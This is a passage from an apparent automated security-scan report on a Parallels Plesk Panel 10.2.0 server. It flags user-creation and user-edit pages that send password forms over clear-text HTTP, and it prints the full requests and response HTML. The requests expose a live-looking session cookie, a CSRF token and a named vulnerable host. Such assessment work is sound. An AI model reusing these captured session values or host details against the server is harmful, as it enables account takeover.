<div class='field-name'><label for='general-vcard-contactName'>Contact name&nbsp;<span class="required">*</span></label></div>
<div class='field-value'>

<input type="text" name="general[vcard][contactName]" id="general-vcard-contactName" value="" class="f-middle-size input-text" />
<span class='field-errors' style="display:none;"></span>

</div>
</div>
<div class="form-row">
<div class='field-name'>
<label for='general-vcard-email-emailType'>E-mail address which is also used as a username for logging in to the Panel&nbsp;</label> <span class="required">*</span>
</div>
<div class="field-value">
<div class="text-value">
<div class="indent-box">

<span><input type="radio" class="radio"
value="internal"
id="general-vcard-email-emailType-internal"
name="general[vcard][email][emailType]"
checked="checked" /></span>

<div class="indent-box-content">
<label for="general-vcard-email-emailType-internal">Create an e-mail address under your account</label>
<div class='form-row'>
<div>
<input type="text" name="general[vcard][email][internalEmail]" id="general-vcard-email-internalEmail" value="" class="input-text" /> @<span id='general-vcard-email-internalEmail-domain'>vulnerable.host.fqdn</span></div>
<span class='field-errors'>
</span>
</div>
</div>

</div>
<div class="indent-box">

<span><input type="radio" class="radio"
value="external"
id="general-vcard-email-emailType-external"
name="general[vcard][email][emailType]"
/></span>

<div class="indent-box-content">
<label for="general-vcard-email-emailType-external">Use an external e-mail address</label>
<div class='form-row'>
<div>
<input type="text" name="general[vcard][email][externalEmail]" id="general-vcard-email-externalEmail" value="" class="f-middle-size input-text" disabled="1" /></div>
<span class='field-errors'>
</span>
</div>
</div>

</div>
</div>
</div>
</div>

<script type="text/javascript">
//<![CDATA[
Smb.UserEmailForm = Class.create({

initialize: function(config) {
this._prefix = config['prefix'];
this._internalEmailId = this._prefix + config['internalEmailId'];
this._internalEmailElements = config['internalEmailElements'];
this._externalEmailId = this._prefix + config['externalEmailId'];
this._externalEmailElements = config['externalEmailElements'];
$(this._internalEmailId).observe('click', this._internalEmailOnClick.bind(this));
$(this._externalEmailId).observe('click', this._externalEmailOnClick.bind(this));
if ($(this._internalEmailId).checked) {
this._internalEmailOnClick();
} else {
   this._externalEmailOnClick();
}
},

_internalEmailOnClick: function() {
this._externalEmailElements.each(function(elementId) {
$(this._prefix + elementId).disable();
}, this);
this._internalEmailElements.each(function(elementId) {
$(this._prefix + elementId).enable();
}, this);
},

_externalEmailOnClick: function() {
this._internalEmailElements.each(function(elementId) {
$(this._prefix + elementId).disable();
}, this);
this._externalEmailElements.each(function(elementId) {
$(this._prefix + elementId).enable();
}, this);
}
});

Jsw.onReady(function() {
new Smb.UserEmailForm({
prefix: 'general-vcard-email-',
internalEmailId: 'emailType-internal',
internalEmailElements: ['internalEmail'
],
externalEmailId: 'emailType-external',
externalEmailElements: ['externalEmail']
});

});
//]]>
</script>


<div id='general-vcard-roleId-form-row' class='form-row' >
<div class='field-name'><label for='general-vcard-roleId'>User role&nbsp;</label></div>
<div class='field-value'>

<select name="general[vcard][roleId]" id="general-vcard-roleId">
<option value="5" label="Owner">Owner</option>
<option value="6" label="WebMaster">WebMaster</option>
<option value="7" label="Application User" selected="selected">Application User</option>
<option value="8" label="Accountant">Accountant</option>
</select>
<span class='field-errors' style="display:none;"></span>
<span class="hint">User roles grant users administrative privileges and access to applications that you selected for the role.</span>
</div>
</div></div>
</div>
<script type='text/javascript'>
//<![CDATA[
Jsw.onReady(function() {
new Jsw.Panel({
title: 'General Information',
applyTo: 'general-vcard'
});
});
//]]>
</script>


<div id='general-account' class='form-box' >
<div id='general-account-content-area'>

<div class='form-row'>
<div class='field-name'><label for='general-account-loginString'>Username&nbsp;</label></div>
<div class='field-value'>
<div class='text-value'>
<span id='general-account-loginString'></span>

</div>
</div>
</div>
<div id='general-account-password-form-row' class='form-row' >
<div class='field-name'><label for='general-account-password'>Password&nbsp;<span class="required">*</span></label></div>
<div class='field-value'>

<input type="password" name="general[account][password]" id="general-account-password" value="" class="input-text" autocomplete="off" />
<span class='field-errors' style="display:none;"></span>

</div>
</div><script type='text/javascript'>
Jsw.onReady(function() {
var pswd = $('general-account-password');
new Jsw.PasswordMeter({
renderTo: 'general-account-password',
renderMode: 'after',
observe: 'general-account-password',
locale: {"title":"Password Strength","description":"To improve your password: ","passwordTooShort":"Make the password longer.","lettersLowerCase":"Use at least one lower-case character.","lettersUpperCase":"Use at least one upper-case character.","numbers1":"Use at least one number.","numbers3":"Use at least three numbers.","specialChar1":"Use at least one special character (for example: !, @, #, $, % ,^, &, *, ?, _, ~).","specialChar2":"Use at least two special characters (for example: !, @, #, $, %, ^, &, *, ?, _, ~).","comboUpperAndLower":"Use both upper and lower-case characters.","comboLettersAndNumbers":"Use both numbers and characters.","comboLettersNumbersSpecial":"Use numbers, characters and special characters.","yourPasswordIsStrong":"Your password is strong, but you can make it even stronger by increasing its length.","verdictNone":"Very weak","verdictVeryWeak":"Very weak","verdictWeak":"Weak","verdictMediocre":"Medium","verdictStrong":"Strong","verdictStronger":"Very strong"}
}).render();
});</script>
<div id='general-account-passwordConfirmation-form-row' class='form-row' >
<div class='field-name'><label for='general-account-passwordConfirmation'>Confirm password&nbsp;<span class="required">*</span></label></div>
<div class='field-value'>

<input type="password" name="general[account][passwordConfirmation]" id="general-account-passwordConfirmation" value="" class="input-text" />
<span class='field-errors' style="display:none;"></span>

</div>
</div>

<div class='form-row'>
<div class='single-row'>
<div class='indent-box'>

<input type="hidden" name="general[account][isActive]" value="0" /><input type="checkbox" name="general[account][isActive]" id="general-account-isActive" value="1" checked="checked" class="checkbox" />
<div class='indent-box-content'>
<label for='general-account-isActive'>User is active&nbsp;</label>
<span class="hint">Active users can access the Panel.</span>
</div>
</div>
</div>
</div></div>
</div>
<script type='text/javascript'>
//<![CDATA[
Jsw.onReady(function() {
new Jsw.Panel({
title: 'Panel Preferences',
applyTo: 'general-account'
});
});
//]]>
</script>


<div class="btns-box">
<div class="box-area">
<div class="form-row">
<div class="field-name">
<span class="required">*</span>
Required fields </div>
<div class="field-value">

<span id='btn-send' class='btn'></span>
<script type='text/javascript'>
Jsw.onReady(function() {
new Jsw.CommandButton({
applyTo: 'btn-send',
title: 'OK',
cls: 'btn',
name: 'send',
value: '',
description: '',
disabled: false,
handler: function(event) { Jsw.submit(this); }
});
});
</script>

<span id='btn-cancel' class='btn'></span>
<script type='text/javascript'>
Jsw.onReady(function() {
new Jsw.CommandButton({
applyTo: 'btn-cancel',
title: 'Cancel',
cls: 'btn',
name: 'cancel',
value: '',
description: '',
disabled: false,
handler: function(event) { Jsw.redirect("/user/list"); }
});
});
</script>

<input type="hidden" name="hidden" value="" id="hidden" />
<!-- ability to submit form via Enter -->
<input type="image" src="/skins/default/img/blank.gif" style="border: 0; height: 0; width: 0; position: absolute;" />
</div>
</div>
</div>
</div>

<input type="hidden" name="forgery_protection_token" value="3e86204e9517123c7f585d736d64aa3f" id="form_forgery_protection_token" /></form>
<script type='text/javascript'>
Jsw.onReady(function() {
new Jsw.FormAjax({
applyTo: 'form-user',
waitButtonTitle: 'Please wait'
})
});
</script>

</div> <!-- /main -->


</div> <!-- /content-body -->

</div> <!-- /content -->
</div> <!-- /content-wrapper -->
</div> <!-- /wrapper -->
</div> <!-- page -->
<div id="footer-wrapper">
<div id="footer">
<a href="http://www.parallels.com" title="Parallels" class="small-logo" onclick="window.open(this.href); return false;"><span>Parallels</span></a>
<a href="http://www.parallels.com" onclick="window.open(this.href); return false;">&copy; Copyright 1999-2011, Parallels. All rights reserved</a>
</div>
</div>
<div id="bottomAnchor"></div>
</body>
</html>

3.10. http://vulnerable.plesk.control.panel.20110407.20:8880/smb/user/create/

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nosedivesailing.com:8880
Path:   /smb/user/create/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

The form contains the following password fields:

Request

GET /smb/user/create/ HTTP/1.1
Host: vulnerable.plesk.control.panel.20110407.20:8880
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PLESKSESSID=17161f28b87a6960fb097d11330c9c53; locale=en-US; psaContext=dashboard

Response

HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0,no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Mon, 23 May 2011 18:23:00 GMT
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
X-Powered-By: ASP.NET
Date: Mon, 23 May 2011 18:23:02 GMT
Connection: close
Content-Length: 23631

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta http-equiv="X-UA-Compatible" content="IE=7" />
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta name="forgery_protection_token" id="forgery_protection_token" content="3e86204e9517123c7f585d736d64aa3f" />

<link rel="shortcut icon" href="/favicon.ico" type="image/x-icon" />
<link rel="icon" href="/favicon.ico" type="image/ico" />







<link href="/skins/default/css/common/base.css?1297698230" media="screen" rel="stylesheet" type="text/css" />
<link href="/skins/default/css/common/btns.css?1297272602" media="screen" rel="stylesheet" type="text/css" />
<link href="/skins/default/css/customer/main.css?1297272602" media="screen" rel="stylesheet" type="text/css" />
<link href="/skins/default/css/customer/custom.css?1274451258" media="screen" rel="stylesheet" type="text/css" />
<!--[if lte IE 7]> <link href="/skins/default/css/common/ie.css?1296843248" media="screen" rel="stylesheet" type="text/css" /><![endif]-->
<!--[if IE 8]> <link href="/skins/default/css/common/ie8.css?1269638970" media="screen" rel="stylesheet" type="text/css" /><![endif]-->
<script type="text/javascript" src="/smb/externals/prototype.js?1302230704"></script>
<script type="text/javascript" src="/javascript/jsw.js?1302230642"></script>
<script type="text/javascript" src="/smb/scripts/smb.js?1302230704"></script>
<title>Create User Account - Parallels Plesk Panel 10.2.0 for Microsoft Windows</title>
<script type="text/javascript">
Jsw.baseUrl = '/smb';
Jsw.skinUrl = '/skins/default';
Jsw.showErrorDetails = false;
</script>

<script type="text/javascript">
// hide navigation if panel shown inside frame
if (top != self) {
var head = document.getElementsByTagName('head')[0];

var stylesheet = document.createElement('link');
stylesheet.type = 'text/css';
stylesheet.rel = 'stylesheet';
stylesheet.href = '/skins/default/css/customer/content-only.css?1286484958';
stylesheet.media = 'screen';

head.appendChild(stylesheet);
}
</script>
</head>
<body class="">
<div class="tooltip" style="display: none;"><b><i><i><i><span></span></i></i></i></b></div>

<div id="page">

<div id="wrapper">
<div id="top-wrapper" class="l-top">
<div id="top">
<div id="header-wrapper">
<div id="header">
<h1 class="logo">
<img src="/skins/default/plesk/images/def_plesk_logo.gif?1274455768" alt="Parallels Plesk Panel 10.2.0 for Microsoft Windows" />
</h1>
<div class="shortcuts">
<ul>
<li class="top-user-info">
<table cellspacing="0">
<tr>
<th>Logged in as</th>
<td>
<b>
<a href="/smb/my-profile">
Hoyt LLC Research </a>
</b>
</td>
</tr>
<tr>
<th>Subscription</th>
<td><div id="subscription-switch"></div></td>
</tr>
</table>
</li>
<li class="top-logout">
<a href="/smb/auth/logout" id="shortcutLogout"><i><span>
Log out </span></i></a>
</li>
<li class="top-help">
<a href="/smb/help/redirect/controller-name/user/action-name/create" target="help"><i><span>
Help </span></i></a>
</li>
</ul>
</div>

<script type="text/javascript">
//<![CDATA[
Jsw.onReady(function() {
new Smb.SubscriptionDropdown({
applyTo: 'subscription-switch',
items: [{"value":"\/account\/switch\/id\/1","title":"vulnerable.host.fqdn"}],
title: 'vulnerable.host.fqdn',
onChange: function(dropdown, item) {
window.location.href = Jsw.baseUrl + item.value
+ '?returnUrl=' + '%2Fuser%2Fcreate%2F' + '&activeModule=' + 'users' }
});
});
//]]>
</script> </div>
</div>
</div>
<div id="navbar"></div>

<script type="text/javascript">
//<![CDATA[
Jsw.onReady(function() {
new Smb.NavigationTabs({
id: 'navbar',
applyTo: 'navbar',
items: [{"componentType":"Jsw.bar.Button","title":"Home","href":"\/admin-home","containerCls":"","addCls":"nav-home"},{"componentType":"Jsw.bar.Button","title":"Users","href":"\/user\/list","containerCls":"active","addCls":"nav-users"},{"componentType":"Jsw.bar.Button","title":"Mail","href":"\/email-address","containerCls":"","addCls":"nav-mail"},{"componentType":"Jsw.bar.Button","title":"Websites &amp; Domains","href":"\/web\/view","containerCls":"","addCls":"nav-sites"},{"componentType":"Jsw.bar.Button","title":"Applications","href":"\/app","containerCls":"","addCls":"nav-apps"},{"componentType":"Jsw.bar.Button","title":"Statistics","href":"\/statistics","containerCls":"","addCls":"nav-statistics"},{"componentType":"Jsw.bar.Button","title":"Account","href":"\/account","containerCls":"","addCls":"nav-account"}] });
});
//]]>
</script>
</div>
<div id="content-wrapper">
<div id="content">

<div id="pathbar-wrapper"></div>

<script type="text/javascript">
//<![CDATA[
Jsw.onReady(function() {
new Jsw.Pathbar({
id: 'pathbar',
cls: 'pathbar clearfix',
renderTo: 'pathbar-wrapper',
items: [] });
});
//]]>
</script>

<div class="heading ">
<div class="heading-area">
<div class="toolbar">
<span id="toolbar-content"></span>
<a class="s-btn sb-uplevel" href="/smb/user/list">
<span>Up Level</span>
</a>
</div>
<h2><span>Create User Account</span></h2>
</div>
</div>


<div id="content-body" class="clearfix">
<div id="main">

<script type="text/javascript">
//<![CDATA[
Smb.UserEditForm = Class.create({

initialize: function(config) {

if (!$('general-account-loginString')) {
return;
}

if ($('general-vcard-email-emailType-internal')) {
$('general-vcard-email-emailType-internal').observe('click', this._generateLogin.bind(this));
}
if ($('general-vcard-email-internalEmail')) {
$('general-vcard-email-internalEmail').observe('keyup', this._generateLogin.bind(this));
$('general-vcard-email-internalEmail').observe('change', this._generateLogin.bind(this));
}
if ($('general-vcard-email-domain')) {
$('general-vcard-email-domain').observe('change', this._generateLogin.bind(this));
}

if ($('general-vcard-email-emailType-external')) {
$('general-vcard-email-emailType-external').observe('click', this._generateLogin.bind(this));
}
if ($('general-vcard-email-externalEmail')) {
$('general-vcard-email-externalEmail').observe('keyup', this._generateLogin.bind(this));
$('general-vcard-email-externalEmail').observe('change', this._generateLogin.bind(this));
}
},

_generateLogin: function() {
if ($('general-vcard-email-emailType-internal') && $('general-vcard-email-emailType-internal').checked) {
var loginString = $('general-vcard-email-internalEmail').value;
if ('' == loginString) {
//empty username
} else
if ($('general-vcard-email-domain')) {
loginString += '@' + $('general-vcard-email-domain').options[$('general-vcard-email-domain').selectedIndex].text;
} else {
loginString += '@' + $('general-vcard-email-internalEmail-domain').innerHTML;
}
$('general-account-loginString').update(loginString);
} else if ($('general-vcard-email-emailType-external') && $('general-vcard-email-emailType-external').checked) {
var loginString = $('general-vcard-email-externalEmail').value;
$('general-account-loginString').update(loginString);
} else if ($('general-vcard-email-externalEmail')) {
var loginString = $('general-vcard-email-externalEmail').value;
$('general-account-loginString').update(loginString);
}
}
});

Jsw.onReady(function() {
new Smb.UserEditForm();
});
//]]>
</script><form id="form-user" enctype="application/x-www-form-urlencoded" action="" method="post">


<div id='general-vcard' class='form-box' >
<div id='general-vcard-content-area'>
<div id='general-vcard-contactName-form-row' class='form-row' >
<div class='field-name'><label for='general-vcard-contactName'>Contact name&nbsp;<span class="required">*</span></label></div>
<div class='field-value'>

<input type="text" name="general[vcard][contactName]" id="general-vcard-contactName" value="" class="f-middle-size input-text" />
<span class='field-errors' style="display:none;"></span>

</div>
</div>
<div class="form-row">
<div class='field-name'>
<label for='general-vcard-email-emailType'>E-mail address which is also used as a username for logging in to the Panel&nbsp;</label> <span class="required">*</span>
</div>
<div class="field-value">
<div class="text-value">
<div class="indent-box">

<span><input type="radio" class="radio"
value="internal"
id="general-vcard-email-emailType-internal"
name="general[vcard][email][emailType]"
checked="checked" /></span>

<div class="indent-box-content">
<label for="general-vcard-email-emailType-internal">Create an e-mail address under your account</label>
<div class='form-row'>
<div>
<input type="text" name="general[vcard][email][internalEmail]" id="general-vcard-email-internalEmail" value="" class="input-text" /> @<span id='general-vcard-email-internalEmail-domain'>vulnerable.host.fqdn</span></div>
<span class='field-errors'>
</span>
</div>
</div>

</div>
<div class="indent-box">

<span><input type="radio" class="radio"
value="external"
id="general-vcard-email-emailType-external"
name="general[vcard][email][emailType]"
/></span>

<div class="indent-box-content">
<label for="general-vcard-email-emailType-external">Use an external e-mail address</label>
<div class='form-row'>
<div>
<input type="text" name="general[vcard][email][externalEmail]" id="general-vcard-email-externalEmail" value="" class="f-middle-size input-text" disabled="1" /></div>
<span class='field-errors'>
</span>
</div>
</div>

</div>
</div>
</div>
</div>

<script type="text/javascript">
//<![CDATA[
Smb.UserEmailForm = Class.create({

initialize: function(config) {
this._prefix = config['prefix'];
this._internalEmailId = this._prefix + config['internalEmailId'];
this._internalEmailElements = config['internalEmailElements'];
this._externalEmailId = this._prefix + config['externalEmailId'];
this._externalEmailElements = config['externalEmailElements'];
$(this._internalEmailId).observe('click', this._internalEmailOnClick.bind(this));
$(this._externalEmailId).observe('click', this._externalEmailOnClick.bind(this));
if ($(this._internalEmailId).checked) {
this._internalEmailOnClick();
} else {
   this._externalEmailOnClick();
}
},

_internalEmailOnClick: function() {
this._externalEmailElements.each(function(elementId) {
$(this._prefix + elementId).disable();
}, this);
this._internalEmailElements.each(function(elementId) {
$(this._prefix + elementId).enable();
}, this);
},

_externalEmailOnClick: function() {
this._internalEmailElements.each(function(elementId) {
$(this._prefix + elementId).disable();
}, this);
this._externalEmailElements.each(function(elementId) {
$(this._prefix + elementId).enable();
}, this);
}
});

Jsw.onReady(function() {
new Smb.UserEmailForm({
prefix: 'general-vcard-email-',
internalEmailId: 'emailType-internal',
internalEmailElements: ['internalEmail'
],
externalEmailId: 'emailType-external',
externalEmailElements: ['externalEmail']
});

});
//]]>
</script>


<div id='general-vcard-roleId-form-row' class='form-row' >
<div class='field-name'><label for='general-vcard-roleId'>User role&nbsp;</label></div>
<div class='field-value'>

<select name="general[vcard][roleId]" id="general-vcard-roleId">
<option value="5" label="Owner">Owner</option>
<option value="6" label="WebMaster">WebMaster</option>
<option value="7" label="Application User" selected="selected">Application User</option>
<option value="8" label="Accountant">Accountant</option>
</select>
<span class='field-errors' style="display:none;"></span>
<span class="hint">User roles grant users administrative privileges and access to applications that you selected for the role.</span>
</div>
</div></div>
</div>
<script type='text/javascript'>
//<![CDATA[
Jsw.onReady(function() {
new Jsw.Panel({
title: 'General Information',
applyTo: 'general-vcard'
});
});
//]]>
</script>


<div id='general-account' class='form-box' >
<div id='general-account-content-area'>

<div class='form-row'>
<div class='field-name'><label for='general-account-loginString'>Username&nbsp;</label></div>
<div class='field-value'>
<div class='text-value'>
<span id='general-account-loginString'></span>

</div>
</div>
</div>
<div id='general-account-password-form-row' class='form-row' >
<div class='field-name'><label for='general-account-password'>Password&nbsp;<span class="required">*</span></label></div>
<div class='field-value'>

<input type="password" name="general[account][password]" id="general-account-password" value="" class="input-text" autocomplete="off" />
<span class='field-errors' style="display:none;"></span>

</div>
</div><script type='text/javascript'>
Jsw.onReady(function() {
var pswd = $('general-account-password');
new Jsw.PasswordMeter({
renderTo: 'general-account-password',
renderMode: 'after',
observe: 'general-account-password',
locale: {"title":"Password Strength","description":"To improve your password: ","passwordTooShort":"Make the password longer.","lettersLowerCase":"Use at least one lower-case character.","lettersUpperCase":"Use at least one upper-case character.","numbers1":"Use at least one number.","numbers3":"Use at least three numbers.","specialChar1":"Use at least one special character (for example: !, @, #, $, % ,^, &, *, ?, _, ~).","specialChar2":"Use at least two special characters (for example: !, @, #, $, %, ^, &, *, ?, _, ~).","comboUpperAndLower":"Use both upper and lower-case characters.","comboLettersAndNumbers":"Use both numbers and characters.","comboLettersNumbersSpecial":"Use numbers, characters and special characters.","yourPasswordIsStrong":"Your password is strong, but you can make it even stronger by increasing its length.","verdictNone":"Very weak","verdictVeryWeak":"Very weak","verdictWeak":"Weak","verdictMediocre":"Medium","verdictStrong":"Strong","verdictStronger":"Very strong"}
}).render();
});</script>
<div id='general-account-passwordConfirmation-form-row' class='form-row' >
<div class='field-name'><label for='general-account-passwordConfirmation'>Confirm password&nbsp;<span class="required">*</span></label></div>
<div class='field-value'>

<input type="password" name="general[account][passwordConfirmation]" id="general-account-passwordConfirmation" value="" class="input-text" />
<span class='field-errors' style="display:none;"></span>

</div>
</div>

<div class='form-row'>
<div class='single-row'>
<div class='indent-box'>

<input type="hidden" name="general[account][isActive]" value="0" /><input type="checkbox" name="general[account][isActive]" id="general-account-isActive" value="1" checked="checked" class="checkbox" />
<div class='indent-box-content'>
<label for='general-account-isActive'>User is active&nbsp;</label>
<span class="hint">Active users can access the Panel.</span>
</div>
</div>
</div>
</div></div>
</div>
<script type='text/javascript'>
//<![CDATA[
Jsw.onReady(function() {
new Jsw.Panel({
title: 'Panel Preferences',
applyTo: 'general-account'
});
});
//]]>
</script>


<div class="btns-box">
<div class="box-area">
<div class="form-row">
<div class="field-name">
<span class="required">*</span>
Required fields </div>
<div class="field-value">

<span id='btn-send' class='btn'></span>
<script type='text/javascript'>
Jsw.onReady(function() {
new Jsw.CommandButton({
applyTo: 'btn-send',
title: 'OK',
cls: 'btn',
name: 'send',
value: '',
description: '',
disabled: false,
handler: function(event) { Jsw.submit(this); }
});
});
</script>

<span id='btn-cancel' class='btn'></span>
<script type='text/javascript'>
Jsw.onReady(function() {
new Jsw.CommandButton({
applyTo: 'btn-cancel',
title: 'Cancel',
cls: 'btn',
name: 'cancel',
value: '',
description: '',
disabled: false,
handler: function(event) { Jsw.redirect("/user/list"); }
});
});
</script>

<input type="hidden" name="hidden" value="" id="hidden" />
<!-- ability to submit form via Enter -->
<input type="image" src="/skins/default/img/blank.gif" style="border: 0; height: 0; width: 0; position: absolute;" />
</div>
</div>
</div>
</div>

<input type="hidden" name="forgery_protection_token" value="3e86204e9517123c7f585d736d64aa3f" id="form_forgery_protection_token" /></form>
<script type='text/javascript'>
Jsw.onReady(function() {
new Jsw.FormAjax({
applyTo: 'form-user',
waitButtonTitle: 'Please wait'
})
});
</script>

</div> <!-- /main -->


</div> <!-- /content-body -->

</div> <!-- /content -->
</div> <!-- /content-wrapper -->
</div> <!-- /wrapper -->
</div> <!-- page -->
<div id="footer-wrapper">
<div id="footer">
<a href="http://www.parallels.com" title="Parallels" class="small-logo" onclick="window.open(this.href); return false;"><span>Parallels</span></a>
<a href="http://www.parallels.com" onclick="window.open(this.href); return false;">&copy; Copyright 1999-2011, Parallels. All rights reserved</a>
</div>
</div>
<div id="bottomAnchor"></div>
</body>
</html>

3.11. http://vulnerable.plesk.control.panel.20110407.20:8880/smb/user/edit/id/2

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nosedivesailing.com:8880
Path:   /smb/user/edit/id/2

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

The form contains the following password fields:

Request

GET /smb/user/edit/id/2 HTTP/1.1
Host: vulnerable.plesk.control.panel.20110407.20:8880
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PLESKSESSID=17161f28b87a6960fb097d11330c9c53; locale=en-US; psaContext=dashboard

Response

HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0,no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Mon, 23 May 2011 18:23:33 GMT
Server: Microsoft-IIS/7.5
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
X-Powered-By: ASP.NET
Date: Mon, 23 May 2011 18:23:34 GMT
Connection: close
Content-Length: 45694

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta http-equiv="X-UA-Compatible" content="IE=7" />
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta name="forgery_protection_token" id="forgery_protection_token" content="3e86204e9517123c7f585d736d64aa3f" />

<link rel="shortcut icon" href="/favicon.ico" type="image/x-icon" />
<link rel="icon" href="/favicon.ico" type="image/ico" />







<link href="/skins/default/css/common/base.css?1297698230" media="screen" rel="stylesheet" type="text/css" />
<link href="/skins/default/css/common/btns.css?1297272602" media="screen" rel="stylesheet" type="text/css" />
<link href="/skins/default/css/customer/main.css?1297272602" media="screen" rel="stylesheet" type="text/css" />
<link href="/skins/default/css/customer/custom.css?1274451258" media="screen" rel="stylesheet" type="text/css" />
<!--[if lte IE 7]> <link href="/skins/default/css/common/ie.css?1296843248" media="screen" rel="stylesheet" type="text/css" /><![endif]-->
<!--[if IE 8]> <link href="/skins/default/css/common/ie8.css?1269638970" media="screen" rel="stylesheet" type="text/css" /><![endif]-->
<script type="text/javascript" src="/smb/externals/prototype.js?1302230704"></script>
<script type="text/javascript" src="/javascript/jsw.js?1302230642"></script>
<script type="text/javascript" src="/smb/scripts/smb.js?1302230704"></script>
<title>Hoyt LLC Research - Parallels Plesk Panel 10.2.0 for Microsoft Windows</title>
<script type="text/javascript">
Jsw.baseUrl = '/smb';
Jsw.skinUrl = '/skins/default';
Jsw.showErrorDetails = false;
</script>

<script type="text/javascript">
// hide navigation if panel shown inside frame
if (top != self) {
var head = document.getElementsByTagName('head')[0];

var stylesheet = document.createElement('link');
stylesheet.type = 'text/css';
stylesheet.rel = 'stylesheet';
stylesheet.href = '/skins/default/css/customer/content-only.css?1286484958';
stylesheet.media = 'screen';

head.appendChild(stylesheet);
}
</script>
</head>
<body class="">
<div class="tooltip" style="display: none;"><b><i><i><i><span></span></i></i></i></b></div>

<div id="page">

<div id="wrapper">
<div id="top-wrapper" class="l-top">
<div id="top">
<div id="header-wrapper">
<div id="header">
<h1 class="logo">
<img src="/skins/default/plesk/images/def_plesk_logo.gif?1274455768" alt="Parallels Plesk Panel 10.2.0 for Microsoft Windows" />
</h1>
<div class="shortcuts">
<ul>
<li class="top-user-info">
<table cellspacing="0">
<tr>
<th>Logged in as</th>
<td>
<b>
<a href="/smb/my-profile">
Hoyt LLC Research </a>
</b>
</td>
</tr>
<tr>
<th>Subscription</th>
<td><div id="subscription-switch"></div></td>
</tr>
</table>
</li>
<li class="top-logout">
<a href="/smb/auth/logout" id="shortcutLogout"><i><span>
Log out </span></i></a>
</li>
<li class="top-help">
<a href="/smb/help/redirect/controller-name/user/action-name/edit" target="help"><i><span>
Help </span></i></a>
</li>
</ul>
</div>

<script type="text/javascript">
//<![CDATA[
Jsw.onReady(function() {
new Smb.SubscriptionDropdown({
applyTo: 'subscription-switch',
items: [{"value":"\/account\/switch\/id\/1","title":"vulnerable.host.fqdn"}],
title: 'vulnerable.host.fqdn',
onChange: function(dropdown, item) {
window.location.href = Jsw.baseUrl + item.value
+ '?returnUrl=' + '%2Fuser%2Fedit%2Fid%2F2' + '&activeModule=' + 'users' }
});
});
//]]>
</script> </div>
</div>
</div>
<div id="navbar"></div>

<script type="text/javascript">
//<![CDATA[
Jsw.onReady(function() {
new Smb.NavigationTabs({
id: 'navbar',
applyTo: 'navbar',
items: [{"componentType":"Jsw.bar.Button","title":"Home","href":"\/admin-home","containerCls":"","addCls":"nav-home"},{"componentType":"Jsw.bar.Button","title":"Users","href":"\/user\/list","containerCls":"active","addCls":"nav-users"},{"componentType":"Jsw.bar.Button","title":"Mail","href":"\/email-address","containerCls":"","addCls":"nav-mail"},{"componentType":"Jsw.bar.Button","title":"Websites &amp; Domains","href":"\/web\/view","containerCls":"","addCls":"nav-sites"},{"componentType":"Jsw.bar.Button","title":"Applications","href":"\/app","containerCls":"","addCls":"nav-apps"},{"componentType":"Jsw.bar.Button","title":"Statistics","href":"\/statistics","containerCls":"","addCls":"nav-statistics"},{"componentType":"Jsw.bar.Button","title":"Account","href":"\/account","containerCls":"","addCls":"nav-account"}] });
});
//]]>
</script>
</div>
<div id="content-wrapper">
<div id="content">

<div id="pathbar-wrapper"></div>

<script type="text/javascript">
//<![CDATA[
Jsw.onReady(function() {
new Jsw.Pathbar({
id: 'pathbar',
cls: 'pathbar clearfix',
renderTo: 'pathbar-wrapper',
items: [] });
});
//]]>
</script>

<div class="heading no-border">
<div class="heading-area">
<div class="toolbar">
<span id="toolbar-content"></span>
<a class="s-btn sb-uplevel" href="/smb/user/list">
<span>Up Level</span>
</a>
</div>
<h2><span><b>Hoyt LLC Research</b></span></h2>
</div>
</div>


<div id="content-body" class="clearfix">
<div id="main">

<script type="text/javascript">
//<![CDATA[
Smb.UserEditForm = Class.create({

initialize: function(config) {

if (!$('general-account-loginString')) {
return;
}

if ($('general-vcard-email-emailType-internal')) {
$('general-vcard-email-emailType-internal').observe('click', this._generateLogin.bind(this));
}
if ($('general-vcard-email-internalEmail')) {
$('general-vcard-email-internalEmail').observe('keyup', this._generateLogin.bind(this));
$('general-vcard-email-internalEmail').observe('change', this._generateLogin.bind(this));
}
if ($('general-vcard-email-domain')) {
$('general-vcard-email-domain').observe('change', this._generateLogin.bind(this));
}

if ($('general-vcard-email-emailType-external')) {
